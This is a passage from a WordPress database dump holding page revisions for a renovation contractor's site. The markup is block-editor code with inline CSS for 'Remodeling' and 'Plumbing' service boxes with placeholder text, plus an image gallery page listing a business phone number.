KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"8ca45d75-1c3f-4403-8e4a-a2609af4befe\"} -->\n<style type=\"text/css\"> .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8ca45d75-1c3f-4403-8e4a-a2609af4befe skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Remodeling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d256038d-61f0-4883-a9b5-65e90d87eb82\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d256038d-61f0-4883-a9b5-65e90d87eb82 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d256038d-61f0-4883-a9b5-65e90d87eb82\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"fcc5e8b7-8bad-4e40-8328-152b289be5c2\"} -->\n<style type=\"text/css\"> .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcc5e8b7-8bad-4e40-8328-152b289be5c2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Plumbing</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Services','','inherit','closed','closed','','160-revision-v1','','','2021-05-27 05:13:31','2021-05-27 05:13:31','',160,'https://cteisys.com/?p=340',0,'revision','',0),(166,1,'2021-05-27 05:16:14','2021-05-27 05:16:14','<!-- wp:paragraph -->\n<p>We take pride in our work. Let us show you. Contact us today (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\" alt=\"\" class=\"wp-image-450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\" alt=\"\" class=\"wp-image-449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\" alt=\"\" class=\"wp-image-447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg\" alt=\"\" class=\"wp-image-446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\" alt=\"\" class=\"wp-image-444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" class=\"wp-image-413\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":414,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" class=\"wp-image-414\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\" alt=\"\" class=\"wp-image-438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" class=\"wp-image-440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\" alt=\"\" class=\"wp-image-441\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a9bea998-7d0c-4e4b-928d-b108fd7a7c6d\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"44ecaf20-952d-4f7f-81b7-7317b0c6079a\"} -->\n<style type=\"text/css\"> .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44ecaf20-952d-4f7f-81b7-7317b0c6079a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\"} -->\n<style type=\"text/css\"> .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 